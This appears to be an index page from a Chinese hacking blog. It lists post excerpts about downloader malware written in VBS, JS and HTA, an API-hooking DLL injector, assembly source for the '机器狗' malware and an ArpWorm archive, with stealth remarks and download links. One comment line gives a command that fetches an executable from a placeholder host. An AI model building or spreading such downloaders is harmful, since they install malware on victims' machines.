作者:lcx
一、先说本blog上有两个比较新颖的vbs下载者,一个是利用CDO.Message组件做的,参见http://hi.baidu.com/myvbscript/blog/item/b64592267c8e4c118b82a102.html;另一个是用Microsoft.XMLDOM做的,参见http://hi.baidu.com/myvbscript/blog/item/b64592267c8e4c118b82a102.html。这两个下载者一个是利用起来比较麻烦,需要事先把exe进行转化。第二使用中cscript.exe会访问网络,不太隐蔽。第二个是有的机器上并不存在这两个组件及利用到ADODB.Stream的,所以有些弊端。
阅读全文 »
Tags: hta,
下载者
作者:lcx
以下代码保存成hta文件,可生成js和vbs下载者
阅读全文 »
Tags: hta,
下载者
作者:lcx
vbs下载者有很多了,我这里是一个伟大的发明,利用CDO.Message做的vbs下载者。伟大是装B的意思。
NP先把代码写完了,详情看这里:http://hi.baidu.com/vbs_zone/blog/item/f254871382e6d0045aaf5358.html
由于NP写的不知什么原因,在我机器上执行后生成的exe,进程不会自动退出,我重新更新一下。
阅读全文 »
Tags: CDO.Message,
VBS,
下载者
作者:lcx
来源:vbs小铺
//将常用的vbs下载者改成js版了。本来想用jsc.exe编译,可是不成功。jsc.exe不认WScript
//use: cscript this.js http://www.xxx.com/xxx.exe c:\xxx.exe
阅读全文 »
Tags: JavaScript,
下载者
鬼仔注:这几天陪老爸去了外地一趟,所以一直没更新,抱歉。
作者:Open
驱动不会写!
程序是枚举所有进程注入DLL 挂钩URLDownloadToFileA函数!
by:Open
下载地址:23_152422_hookapi.rar
Tags: 下载者
文章作者:naitm
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章备注:从IDA中复制,稍作修改所得。
ASM
阅读全文 »
Tags: 下载者,
机器狗,
源码
原始出处:http://www.antcodes.cn/post/17.html
C
阅读全文 »
Tags: C#,
Delphi,
Visual Basic,
下载者
文章作者:教主
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
作者网站:黑色技术 www.Rootkit.com.cn
——————————————————–
公开源码用于编程交流。利用此代码修改或传播与作者无任何关系。
代码环境:Vc++
需要Winpcap 支持
解压缩密码:fengzi
—————淫荡的分割线———————–
此份代码很乱,没有太大的技术含量,高手可以飘过。。。。
——————————————————–
下载地址:ArpWorm.rar
Tags: Worm,
下载者,
源码